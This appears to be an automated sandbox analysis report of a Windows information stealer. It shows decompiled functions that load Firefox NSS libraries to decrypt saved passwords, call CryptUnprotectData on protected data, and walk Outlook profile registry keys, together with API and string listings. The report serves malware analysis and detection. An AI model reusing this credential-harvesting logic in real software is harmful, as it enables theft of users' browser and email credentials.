Opcode Fuzzy Hash: 47e42df10be03affcba100174f1a232a46aff3e394c5f05d4781cea89dfadeb7
Instruction Fuzzy Hash: 35514B71901119AACB15EF62CC86CEFBB7CEF44354F10417AF416B71D1EA785A44CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC54, Relevance: 6.0, APIs: 4, Instructions: 49
encryptionmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040CC54(intOrPtr __ecx, void** __edx, long* _a4) {
				intOrPtr _v8;
				void* _t6;
				void* _t8;
				long* _t9;
				void* _t13;
				void** _t14;
				void* _t16;
				void* _t17;

				_t9 = _a4;
				_t17 = 0;
				_v8 = __ecx;
				_t14 = __edx;
				 *_t9 = 0;
				 *((intOrPtr*)(__edx)) = 0; // executed
				__imp__CryptStringToBinaryW(__ecx, 0, 1, 0, _t9, 0, 0, _t13, _t16, _t8, __ecx); // executed
				if(__ecx != 0) {
					_t6 = LocalAlloc(0x40,  *_t9);
					 *_t14 = _t6;
					if(_t6 != 0) {
						__imp__CryptStringToBinaryW(_v8, 0, 1, _t6, _t9, 0, 0); // executed
						_t17 = _t6;
						if(_t17 == 0) {
							 *_t14 = LocalFree( *_t14);
						}
					}
				}
				return _t17;
			}

0x0040cc59
0x0040cc60
0x0040cc62
0x0040cc6b
0x0040cc6d
0x0040cc71
0x0040cc73
0x0040cc7b
0x0040cc81
0x0040cc87
0x0040cc8b
0x0040cc97
0x0040cc9d
0x0040cca1
0x0040ccab
0x0040ccab
0x0040cca1
0x0040cc8b
0x0040ccb3

APIs

CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040CC73
LocalAlloc.KERNEL32(00000040,?,?,0040CBC6,?,00000000,?,00000000,?), ref: 0040CC81
CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040CC97
LocalFree.KERNEL32(?,?,0040CBC6,?,00000000,?,00000000,?), ref: 0040CCA5

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 0413e94adcb2339395a87e2e52bcc88541e051b53830691b94a72c27296d8374
Instruction ID: 9c373eb6a10f65962ee0bde220e476f2e161b831225db717d250f15b1d3c5667
Opcode Fuzzy Hash: 0413e94adcb2339395a87e2e52bcc88541e051b53830691b94a72c27296d8374
Instruction Fuzzy Hash: 6E011971601222BFEB214B5BDD4DE97BFACEF497A5B104131FA09E6250E7758C00CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 046A42D0, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 486COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046A43BD
_memset.LIBCMT ref: 046A4571

Strings

:memory:, xrefs: 046A431E

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID: :memory:
API String ID: 2102423945-2920599690
Opcode ID: 2804689ece6b125d29712188007198de5bb16c2f0363044e99b43928a17977b1
Instruction ID: b3f7810dbb7351a2c2e3569ec80602949e73210d74516ea2acaf225d8eebc966
Opcode Fuzzy Hash: 2804689ece6b125d29712188007198de5bb16c2f0363044e99b43928a17977b1
Instruction Fuzzy Hash: 5512A2B0A006548FDB25CF24DC847AAB7B5EF15308F1881A9D8599B342EBB1FD64CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0040CAFC, Relevance: 4.5, APIs: 3, Instructions: 46
memoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040CAFC(intOrPtr __ecx, char __edx, intOrPtr _a20, void** _a24, long* _a28) {
				void* _v8;
				long _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char* _t16;
				void* _t18;
				long _t23;
				char* _t26;

				_v24 = __ecx;
				_v28 = __edx;
				_v20 = 0;
				_t16 =  &_v28;
				_v16 = 0;
				__imp__CryptUnprotectData(_t16, 0,  &_v20, 0, 0, _a20,  &_v12); // executed
				_t26 = _t16;
				if(_t26 != 0) {
					_t23 = _v12;
					_t27 = _a28;
					 *_a28 = _t23;
					_t18 = LocalAlloc(0x40, _t23);
					 *_a24 = _t18;
					if(_t18 != 0) {
						E0040102C(_t18, _v8,  *_t27);
					}
					LocalFree(_v8);
				}
				return _t26;
			}

0x0040cb07
0x0040cb10
0x0040cb18
0x0040cb1d
0x0040cb20
0x0040cb24
0x0040cb2a
0x0040cb2e
0x0040cb30
0x0040cb33
0x0040cb39
0x0040cb3b
0x0040cb44
0x0040cb48
0x0040cb50
0x0040cb55
0x0040cb5b
0x0040cb5b
0x0040cb66

APIs

CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?), ref: 0040CB24
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,0040CAD5,?,00000000,?,?,?,?,0040CA44), ref: 0040CB3B
LocalFree.KERNEL32(0040CAD5,?,?,?,?,?,0040CAD5,?,00000000,?,?,?,?,0040CA44), ref: 0040CB5B

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: d07056e6058d1041da3554faf4bd58ce6aa8df7867045fc1a761222ec7b01c75
Instruction ID: 215fa3fe11215347c3d1e171e52ffe0a00858422dd62dca2444b50e8a43090fe
Opcode Fuzzy Hash: d07056e6058d1041da3554faf4bd58ce6aa8df7867045fc1a761222ec7b01c75
Instruction Fuzzy Hash: D80100B5900209EFDB059FA5DC0A8EFBBB9EB88311B10416AED41A3350E67599448AA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401085, Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401085(long _a4) {
				void* _t3;

				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				return _t3;
			}

0x00401092
0x00401098

APIs

GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 2ce1b78a034ac1476b0e63f24973bc94a1c952517539569c7485caeabb8436b8
Instruction ID: a18a2fe82ce61e382abdac33cea282e384ee883724b83e466bfc4f852b53c720
Opcode Fuzzy Hash: 2ce1b78a034ac1476b0e63f24973bc94a1c952517539569c7485caeabb8436b8
Instruction Fuzzy Hash: 1AB01231444200FBCF001BE09D0CF493B28ABD4713F00C410F205C1060C6314080DB15

Uniqueness

Uniqueness Score: -1.00%

Function 04699970, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(0470EC40,046933B4,?,046F36AD), ref: 046999A4

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: a447895e7b35651489e60a039b430a534de3e405ffbf2adaf8847340c780b50e
Instruction ID: f0ad6a633b553deebe5607d2c17b925290886f14f6a83974a51ca9b1c0045c75
Opcode Fuzzy Hash: a447895e7b35651489e60a039b430a534de3e405ffbf2adaf8847340c780b50e
Instruction Fuzzy Hash: A70187F1903250CF975A9F78A5456A777E5F704705B088A2AD805D6304FF796CC88B81

Uniqueness

Uniqueness Score: -1.00%

Function 0040F93F, Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70a123d0a38f8f88a807db75fd4d29bf0a4123b82be8a1095914169ea9aca7b1
Instruction ID: 3cf98475d967d69efdc540c71a22f5173ff4fdfd19d679cdcd5144f8e32d7552
Opcode Fuzzy Hash: 70a123d0a38f8f88a807db75fd4d29bf0a4123b82be8a1095914169ea9aca7b1
Instruction Fuzzy Hash: 3421ADB1D00108ABDB15DF99C8C2BEEBB79AF44314F14407BF545FB281E634598587A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040B67E, Relevance: 47.5, APIs: 10, Strings: 17, Instructions: 219
libraryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040B67E(void* __ecx, void* __edx, WCHAR* _a4) {
				WCHAR* _v8;
				long _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				char _v24;
				char _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				short _v560;
				void* _t117;
				int _t119;
				void* _t125;
				int _t127;
				struct HINSTANCE__* _t131;
				struct HINSTANCE__* _t132;
				struct HINSTANCE__* _t133;
				struct HINSTANCE__* _t134;
				struct HINSTANCE__* _t135;
				WCHAR* _t158;
				struct HINSTANCE__* _t194;
				void* _t206;
				void* _t216;
				void* _t218;

				_t206 = __edx;
				_t158 = 0;
				_t216 = __ecx;
				E00401052( &_v560, 0, 0x104);
				GetCurrentDirectoryW(0x104,  &_v560);
				SetCurrentDirectoryW(_a4);
				E0040346A( &_a4, _t206, 0, "\\"); // executed
				E0040362D( &_v40,  &_a4); // executed
				E0040346A( &_v40, _t206, 0, L"nss3.dll"); // executed
				E0040362D( &_v20,  &_a4); // executed
				E0040346A( &_v20, _t206, 0, L"msvcr120.dll"); // executed
				E0040362D( &_v16,  &_a4); // executed
				E0040346A( &_v16, _t206, 0, L"msvcp120.dll"); // executed
				E0040362D( &_v36,  &_a4); // executed
				E0040346A( &_v36, _t206, 0, L"mozglue.dll"); // executed
				E0040362D( &_v32,  &_a4); // executed
				E0040346A( &_v32, _t206, 0, L"softokn3.dll"); // executed
				E0040362D( &_v28,  &_a4); // executed
				E0040346A( &_v28, _t206, 0, L"msvcp"); // executed
				E0040362D( &_v24,  &_a4); // executed
				E0040346A( &_v24, _t206, 0, L"msvcr"); // executed
				_t218 = 0x5a;
				_v12 = 0x104;
				while(1) {
					E0040362D( &_v8,  &_v28); // executed
					_t117 = E00403272( &_v8, _t206, 0, _v12); // executed
					E0040346A(_t117, _t206, 0, L".dll"); // executed
					_t119 = PathFileExistsW(_v8); // executed
					if(_t119 != 0) {
						break;
					}
					_v12 = _v12 + 0xa;
					L00405EA5(_v8);
					_t224 = _v12 - 0x96;
					_v8 = _t158;
					if(_v12 != 0x96) {
						continue;
					} else {
						while(1) {
							L5:
							E0040362D( &_v8,  &_v24); // executed
							_t125 = E00403272( &_v8, _t206, _t224, _t218); // executed
							E0040346A(_t125, _t206, _t224, L".dll"); // executed
							_t127 = PathFileExistsW(_v8); // executed
							if(_t127 != 0) {
								break;
							}
							_t218 = _t218 + 0xa;
							L00405EA5(_v8);
							_v8 = _t158;
							if(_t218 != 0x96) {
								continue;
							}
							L9:
							_t131 = LoadLibraryW(_v20); // executed
							 *(_t216 + 0xa8) = _t131;
							_t132 = LoadLibraryW(_v16); // executed
							 *(_t216 + 0xac) = _t132;
							_t133 = LoadLibraryW(_v36); // executed
							 *(_t216 + 0xb0) = _t133;
							_t134 = LoadLibraryW(_v40); // executed
							 *(_t216 + 0xb4) = _t134;
							_t135 = LoadLibraryW(_v32); // executed
							 *(_t216 + 0xb8) = _t135;
							if( *(_t216 + 0xac) != _t158 &&  *(_t216 + 0xb0) != _t158) {
								_t194 =  *(_t216 + 0xb4);
								if(_t194 != 0) {
									_t230 = _t135;
									if(_t135 != 0) {
										_push(_t194);
										 *((intOrPtr*)(_t216 + 0x68)) = E00410969(_t194, "NSS_Init", _t230);
										 *((intOrPtr*)(_t216 + 0x80)) = E00410969( *(_t216 + 0xb4), "PK11_GetInternalKeySlot", _t230);
										 *((intOrPtr*)(_t216 + 0x7c)) = E00410969( *(_t216 + 0xb4), "PK11_Authenticate", _t230);
										 *((intOrPtr*)(_t216 + 0x70)) = E00410969( *(_t216 + 0xb4), "PK11SDR_Decrypt", _t230);
										 *((intOrPtr*)(_t216 + 0x74)) = E00410969( *(_t216 + 0xb4), "NSSBase64_DecodeBuffer", _t230);
										 *((intOrPtr*)(_t216 + 0x78)) = E00410969( *(_t216 + 0xb4), "PK11_CheckUserPassword", _t230);
										 *((intOrPtr*)(_t216 + 0x6c)) = E00410969( *(_t216 + 0xb4), "NSS_Shutdown", _t230);
										 *((intOrPtr*)(_t216 + 0x84)) = E00410969( *(_t216 + 0xb4), "PK11_FreeSlot", _t230);
										 *((intOrPtr*)(_t216 + 0x88)) = E00410969( *(_t216 + 0xb4), "PR_GetError", _t230);
										SetCurrentDirectoryW( &_v560);
										_t158 = 1;
									}
								}
							}
							L00405EA5(_v24);
							L00405EA5(_v28);
							L00405EA5(_v32);
							L00405EA5(_v36);
							L00405EA5(_v16);
							L00405EA5(_v20);
							L00405EA5(_v40);
							L00405EA5(_a4);
							return _t158;
						}
						E00403437( &_v20,  &_v8);
						L00405EA5(_v8);
						goto L9;
					}
				}
				E00403437( &_v16,  &_v8);
				L00405EA5(_v8);
				goto L5;
			}

0x0040b67e
0x0040b696
0x0040b698
0x0040b69c
0x0040b6ac
0x0040b6b5
0x0040b6c3
0x0040b6cf
0x0040b6dc
0x0040b6e8
0x0040b6f5
0x0040b701
0x0040b70e
0x0040b71a
0x0040b727
0x0040b733
0x0040b740
0x0040b74c
0x0040b759
0x0040b765
0x0040b772
0x0040b779
0x0040b77a
0x0040b77d
0x0040b784
0x0040b794
0x0040b79b
0x0040b7a3
0x0040b7ab
0x00000000
0x00000000
0x0040b7b0
0x0040b7b4
0x0040b7b9
0x0040b7c0
0x0040b7c3
0x00000000
0x0040b7c5
0x0040b7db
0x0040b7db
0x0040b7e2
0x0040b7f0
0x0040b7f7
0x0040b7ff
0x0040b807
0x00000000
0x00000000
0x0040b80c
0x0040b80f
0x0040b814
0x0040b81d
0x00000000
0x00000000
0x0040b835
0x0040b83e
0x0040b843
0x0040b849
0x0040b84e
0x0040b854
0x0040b859
0x0040b85f
0x0040b864
0x0040b86a
0x0040b86c
0x0040b878
0x0040b88a
0x0040b892
0x0040b898
0x0040b89a
0x0040b8a0
0x0040b8b6
0x0040b8c9
0x0040b8df
0x0040b8f2
0x0040b905
0x0040b918
0x0040b92b
0x0040b93e
0x0040b949
0x0040b957
0x0040b95f
0x0040b95f
0x0040b89a
0x0040b892
0x0040b963
0x0040b96b
0x0040b973
0x0040b97b
0x0040b983
0x0040b98b
0x0040b993
0x0040b99b
0x0040b9a6
0x0040b9a6
0x0040b828
0x0040b830
0x00000000
0x0040b830
0x0040b7c3
0x0040b7ce
0x0040b7d6
0x00000000

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040B6AC
SetCurrentDirectoryW.KERNEL32(?), ref: 0040B6B5

Part of subcall function 0040362D: lstrcpyW.KERNEL32 ref: 00403657

Part of subcall function 00403272: wsprintfW.USER32 ref: 0040328D

PathFileExistsW.SHLWAPI(0040A760,?,.dll,?,msvcr,?,msvcp,?,softokn3.dll,?,mozglue.dll,?,msvcp120.dll,?,msvcr120.dll,?), ref: 0040B7A3
PathFileExistsW.SHLWAPI(0040A760,0000005A,.dll,?,0040A760), ref: 0040B7FF
LoadLibraryW.KERNEL32(?,0040A760), ref: 0040B83E
LoadLibraryW.KERNEL32(?), ref: 0040B849
LoadLibraryW.KERNEL32(?), ref: 0040B854
LoadLibraryW.KERNEL32(?), ref: 0040B85F
LoadLibraryW.KERNEL32(?), ref: 0040B86A
SetCurrentDirectoryW.KERNEL32(?), ref: 0040B957

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Strings

nss3.dll, xrefs: 0040B6D4
PK11_Authenticate, xrefs: 0040B8C4
mozglue.dll, xrefs: 0040B71F
PK11_FreeSlot, xrefs: 0040B926
PK11_CheckUserPassword, xrefs: 0040B900
NSS_Shutdown, xrefs: 0040B913
NSSBase64_DecodeBuffer, xrefs: 0040B8ED
msvcp120.dll, xrefs: 0040B706
PK11SDR_Decrypt, xrefs: 0040B8DA
.dll, xrefs: 0040B789, 0040B7E7
NSS_Init, xrefs: 0040B8A1
PK11_GetInternalKeySlot, xrefs: 0040B8B1
msvcp, xrefs: 0040B751
PR_GetError, xrefs: 0040B939
msvcr120.dll, xrefs: 0040B6ED
msvcr, xrefs: 0040B76A
softokn3.dll, xrefs: 0040B738

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LibraryLoad$CurrentDirectory$ExistsFilePath$FreeVirtuallstrcpywsprintf
String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
API String ID: 410702425-850564384
Opcode ID: fef07b934e2cc8bbb776659d1daae5da181a697168e2a0b49f38635173518fc3
Instruction ID: 3cd22339cab3e0b34e6d6484c9c52d57fa8d2725b080aa23ef78d8fb8eeae670
Opcode Fuzzy Hash: fef07b934e2cc8bbb776659d1daae5da181a697168e2a0b49f38635173518fc3
Instruction Fuzzy Hash: 0B91FAB1A00609EBDB04EFB2D8969DEBB79FF54304F10413BA515B7291DB386B44CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0D8, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 160
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040A0D8(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr _v20;
				short _v4116;
				short _v8212;
				short _v12308;
				long _t38;
				long _t40;
				long _t42;
				long _t44;
				long _t68;
				int _t74;
				intOrPtr _t75;
				void* _t76;
				short* _t80;

				_t76 = __edx;
				_t75 = __ecx;
				E00401190(0x3014, __ecx);
				_v20 = _t75;
				_t74 = 0;
				E00401052( &_v4116, 0, 0x800);
				E00401052( &_v8212, 0, 0x800);
				_t38 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Office\\15.0Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8); // executed
				if(_t38 != 0) {
					_t40 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8); // executed
					__eflags = _t40;
					if(__eflags != 0) {
						_t42 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8); // executed
						__eflags = _t42;
						if(__eflags != 0) {
							_t80 = L"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676";
							_t44 = RegOpenKeyExW(0x80000001, _t80, 0, 0xf003f,  &_v8); // executed
							__eflags = _t44;
							if(__eflags != 0) {
								L15:
								__eflags = 0;
								return 0;
							}
							_push(_t80);
							L8:
							lstrcpyW( &_v4116, ??);
							if(RegQueryInfoKeyW(_v8, _t74, _t74, _t74,  &_v16,  &_v12, _t74, _t74, _t74, _t74, _t74, _t74) != 0) {
								goto L15;
							}
							if(_v16 <= _t74) {
								L14:
								return 1;
							} else {
								goto L10;
							}
							while(1) {
								L10:
								_v12 = 0x800;
								if(RegEnumKeyExW(_v8, _t74,  &_v12308,  &_v12, 0, 0, 0, 0) != 0) {
									goto L15;
								}
								RegCloseKey(_v8);
								lstrcpyW( &_v8212,  &_v4116);
								lstrcatW( &_v8212, "\\");
								lstrcatW( &_v8212,  &_v12308);
								_t68 = RegOpenKeyExW(0x80000001,  &_v8212, 0, 0xf003f,  &_v8);
								_t90 = _t68;
								if(_t68 != 0) {
									goto L15;
								}
								_push(_t75);
								_t75 = _v20;
								E0040A29A(_t75, _t76, _t90, _v8);
								RegCloseKey(_v8);
								if(RegOpenKeyExW(0x80000001,  &_v4116, 0, 0xf003f,  &_v8) != 0) {
									goto L15;
								}
								_t74 = _t74 + 1;
								if(_t74 < _v16) {
									continue;
								}
								goto L14;
							}
							goto L15;
						}
						_push(L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676");
						goto L8;
					}
					_push(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
					goto L8;
				}
				_push(L"Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
				goto L8;
			}

0x0040a0d8
0x0040a0d8
0x0040a0e0
0x0040a0ed
0x0040a0f1
0x0040a0fb
0x0040a10c
0x0040a12f
0x0040a133
0x0040a14c
0x0040a14e
0x0040a150
0x0040a169
0x0040a16b
0x0040a16d
0x0040a17c
0x0040a187
0x0040a189
0x0040a18b
0x0040a293
0x0040a293
0x00000000
0x0040a293
0x0040a191
0x0040a192
0x0040a19f
0x0040a1bd
0x00000000
0x00000000
0x0040a1c6
0x0040a28e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a1cc
0x0040a1cc
0x0040a1ce
0x0040a1f0
0x00000000
0x00000000
0x0040a1f9
0x0040a20d
0x0040a21b
0x0040a22f
0x0040a24c
0x0040a24e
0x0040a250
0x00000000
0x00000000
0x0040a252
0x0040a256
0x0040a259
0x0040a261
0x0040a282
0x00000000
0x00000000
0x0040a284
0x0040a288
0x00000000
0x00000000
0x00000000
0x0040a288
0x00000000
0x0040a1cc
0x0040a16f
0x00000000
0x0040a16f
0x0040a152
0x00000000
0x0040a152
0x0040a135
0x00000000

APIs

RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?,?,?,?,?,00000000), ref: 0040A12F
RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?,?,?,?,?,00000000), ref: 0040A14C
lstrcpyW.KERNEL32 ref: 0040A19F
RegQueryInfoKeyW.ADVAPI32 ref: 0040A1B5
RegEnumKeyExW.ADVAPI32(?,00000000,?,00000800,00000000,00000000,00000000,00000000,?,?,?,?), ref: 0040A1E8
RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 0040A1F9
lstrcpyW.KERNEL32 ref: 0040A20D
lstrcatW.KERNEL32(?,00414684), ref: 0040A21B
lstrcatW.KERNEL32(?,?), ref: 0040A22F
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?,?,?,?,?), ref: 0040A24C
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?), ref: 0040A261
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?,?,?,?,?,?), ref: 0040A27E

Strings

Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040A15F, 0040A16F
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040A135
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040A142, 0040A152
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040A17C, 0040A181, 0040A191
Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040A125

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Open$Closelstrcatlstrcpy$EnumInfoQuery
String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
API String ID: 1891545080-2020977430
Opcode ID: 21372609fb8b59a61b6319a3bad4b110c4e1e25f3d4e01faebfa4960ce8ac778
Instruction ID: 3b09ce140b779f32128b2b507774cdcec2852ce8a85b0d369bf0fcab4c4bb44c
Opcode Fuzzy Hash: 21372609fb8b59a61b6319a3bad4b110c4e1e25f3d4e01faebfa4960ce8ac778
Instruction Fuzzy Hash: C3419DB290021DFEEB21DAA1DC44EFF777CEB04784F1004BAB605F2141E6789E909BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00413435, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 188
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00413435(void* __eflags) {
				char _v592;
				char _v608;
				char _v1120;
				short _v1140;
				char _v1372;
				intOrPtr _v1484;
				char _v1488;
				char _v1500;
				char _v1504;
				char _v1520;
				intOrPtr _v1532;
				intOrPtr _v1536;
				intOrPtr _v1544;
				intOrPtr _v1552;
				intOrPtr _v1568;
				intOrPtr _v1576;
				char _v1580;
				char _v1584;
				intOrPtr _v1588;
				int _v1592;
				char _v1600;
				char _v1604;
				char _v1608;
				void* _v1612;
				char _v1616;
				char _v1620;
				char _v1632;
				void* __ebx;
				void* __edi;
				void* _t56;
				void* _t98;
				void* _t101;
				CHAR* _t114;
				char* _t121;
				CHAR* _t127;
				void* _t131;
				intOrPtr _t143;

				_v1600 = 0xa;
				_v1592 = 0;
				E00405BF1( &_v1580);
				E00411638( &_v1500);
				E004010AD(GetTickCount());
				_v1632 = 0x104;
				GetModuleFileNameA(0,  &_v1372, _t127);
				_v1608 = 0;
				_t56 = E00411E21( &_v1372,  &_v1608); // executed
				_t126 = _v1608;
				if(_v1608 == 0) {
					L20:
					E004110D7( &_v1500);
					E00405C16( &_v1580, _t127);
					return 0;
				} else {
					_v1604 = 0;
					E00411BF8(_t56, _t126, 0x215a,  &_v1604);
					_t131 = 0x20;
					_t127 = E00401085(_t131);
					_t114 = _t127;
					do {
						 *_t114 = 0;
						_t114 =  &(_t114[1]);
						_t131 = _t131 - 1;
					} while (_t131 != 0);
					E0040102C(_t127,  &_v1604, 4);
					 *0x4198b8 = CreateEventA(0, 0, 0, _t127);
					if(GetLastError() == 0xb7) {
						goto L20;
					}
					_t143 =  *0x4198b8; // 0x31c
					if(_t143 == 0) {
						goto L20;
					}
					RegCreateKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", 0, 0, 0, 0xf003f, 0,  &_v1612,  &_v1592); // executed
					RegSetValueExA(_v1612, "MaxConnectionsPer1_0Server", 0, 4,  &_v1600, 4); // executed
					RegSetValueExA(_v1612, "MaxConnectionsPerServer", 0, 4,  &_v1600, 4); // executed
					RegCloseKey(_v1612);
					E00405A10( &_v1580, _t126, _t143); // executed
					E004114A6( &_v1500, _t126, _t143,  &_v1580); // executed
					_t117 =  &_v592;
					E00404EE7( &_v592, _t126, _t143,  &_v1584,  &_v1504); // executed
					E00401052( &_v1120, 0, 0x208);
					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v1120); // executed
					lstrcatW( &_v1140, L"\\Microsoft Vision\\");
					CreateDirectoryW( &_v1140, 0); // executed
					if(_v1552 != 0 && E0040FBFC() != 1) {
						_t101 = E0040F51D();
						_t146 = _t101 - 0xa;
						if(_t101 != 0xa) {
							E00411A3C(0,  &_v592, __eflags);
						} else {
							E00411AB9(_t126, _t146);
						}
					}
					if(_v1536 != 0) {
						_t98 = E0040FBFC();
						_t148 = _t98 - 1;
						if(_t98 == 1) {
							L00412FD7(_t117, _t148);
						}
					}
					_t149 = _v1484;
					if(_v1484 != 0) {
						L16:
						__eflags = _v1544;
						if(__eflags != 0) {
							L00411F13();
						}
						E00404E5B( &_v608, _t126, __eflags); // executed
						goto L19;
					} else {
						E00411136( &_v1520, _t149, _v1576, _v1568, _v1532); // executed
						_t150 = _v1588;
						if(_v1588 == 0) {
							goto L16;
						}
						_v1608 = 0;
						_t121 =  &_v1616;
						E0040362D(_t121,  &_v1488);
						_push(_t121);
						E00410BD9( &_v1608, _t150,  &_v1620,  &_v1612);
						L00405EA5(_v1632);
						L00405EA5(0);
						L19:
						E00404BC0( &_v608, _t127, _t150);
						goto L20;
					}
				}
			}

0x00413445
0x00413452
0x00413456
0x00413462
0x0041346e
0x00413473
0x00413483
0x0041348d
0x00413498
0x0041349d
0x004134a3
0x004136ad
0x004136b4
0x004136bd
0x004136ca
0x004134a9
0x004134ad
0x004134b9
0x004134c0
0x004134c7
0x004134cc
0x004134ce
0x004134ce
0x004134d0
0x004134d1
0x004134d1
0x004134de
0x004134f0
0x00413500
0x00000000
0x00000000
0x00413506
0x0041350c
0x00000000
0x00000000
0x0041352f
0x0041354e
